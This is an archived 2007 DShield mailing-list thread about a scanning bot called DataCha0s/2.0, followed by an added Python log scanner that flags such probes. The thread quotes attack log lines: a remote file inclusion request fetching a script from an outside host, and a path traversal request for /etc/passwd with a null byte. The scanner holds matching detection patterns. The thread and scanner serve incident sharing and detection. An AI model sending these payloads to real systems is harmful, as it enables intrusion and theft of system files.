[Dshield] DataCha0s/2.0?

Seth Tregenna seth.tregenna at googlemail.com
Thu Apr 26 13:45:26 GMT 2007


I've seen similar to Koen coming from:

2007-04-10 - 208.51.27.144
2007-04-17 - 202.134.73.145, 194.116.202.26
2007-04-19 - 216.75.35.19
2007-04-20 - 200.166.228.75
2007-04-23 - 133.3.8.135
2007-04-24 - 216.143.219.14
2007-04-25 - 217.160.246.125

Nothing today so far though.....

On 26/04/07, Koen Van Impe <koen.vanimpe at belnet.be> wrote:
>
> Ryan McConigley wrote:
> > Hi, I'm just curious, but has anyone else noticed a sudden rush of
> > attempted web exploits from a script/bot that identifies itself as
> > DataCha0s/2.0?
> >
>
> Yes.
>
> It looks like a bot that scans for vulnerable Perl AWStats installs
> (throw DataCha0s in Google and you'll get a number of interesting hits).
>
> We see similar attempts coming from 133.3.8.135, 217.174.240.113,
> 72.2.4.176, 203.89.187.231, 217.160.246.125
> with requests like this:
>
> [23/Apr/2007:05:26:32 +0200] "GET /index.php?module=http://www.regimesyndicate.org/powned.txt? HTTP/1.0" 200 2306 "-" "DataCha0s/2.0"
> or
> [26/Apr/2007:02:58:28 +0200] "GET /index.php?module=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 500 534 "-" "DataCha0s/2.0"
>
>
> --
> Koen Van Impe - BELNET CERT
> koen.vanimpe at belnet.be
> PGP Key Id 0xED12AD79
> Contact: http://cert.belnet.be/
>
>
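An added example, not part of the original thread: a log scan for the two request shapes quoted above (a URL passed as a parameter value, and `../` traversal with a trailing `%00`). It matches on request content rather than the User-Agent string, so the same probes sent under another agent name are still flagged. The combined log format, the sample lines, their client addresses (documentation ranges), and the names `classify` and `scan` are all assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines (Apache combined format); addresses are from
# documentation ranges and files.example.org is a placeholder host.
SAMPLE_LOG = '''\
192.0.2.10 - - [23/Apr/2007:05:26:32 +0200] "GET /index.php?module=http://files.example.org/x.txt? HTTP/1.0" 200 2306 "-" "DataCha0s/2.0"
192.0.2.10 - - [26/Apr/2007:02:58:28 +0200] "GET /index.php?module=../../../../../../etc/passwd%00 HTTP/1.0" 500 534 "-" "DataCha0s/2.0"
198.51.100.7 - - [26/Apr/2007:03:01:02 +0200] "GET /index.php?module=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Apr/2007:03:04:40 +0200] "GET /index.php?module=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 310 "-" "Mozilla/4.0"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(target):
    """Return the set of findings for one request target (path plus query)."""
    findings = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # second decode pass catches double-encoded input
        if "\x00" in value:
            findings.add("null-byte")       # %00 used to cut off an appended suffix
        if re.match(r"(?i)(https?|ftp)://", value):
            findings.add("remote-include")  # parameter value is itself a URL
        if re.search(r"\.\.[\\/]", value):
            findings.add("traversal")       # ../ or ..\ after decoding
    return findings

def scan(log_text):
    """Map client IP -> agents, findings and hit count for flagged requests."""
    report = defaultdict(lambda: {"agents": set(), "findings": set(), "hits": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        findings = classify(m["target"]) if m else set()
        if findings:
            entry = report[m["ip"]]
            entry["agents"].add(m["ua"])
            entry["findings"] |= findings
            entry["hits"] += 1
    return dict(report)

if __name__ == "__main__":
    for ip, entry in sorted(scan(SAMPLE_LOG).items()):
        print(ip, entry["hits"], sorted(entry["findings"]), sorted(entry["agents"]))
```

The response status is captured but not used for flagging; the quoted requests returned 200 and 500, so a flagged request that returned 200 is the one to review first.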

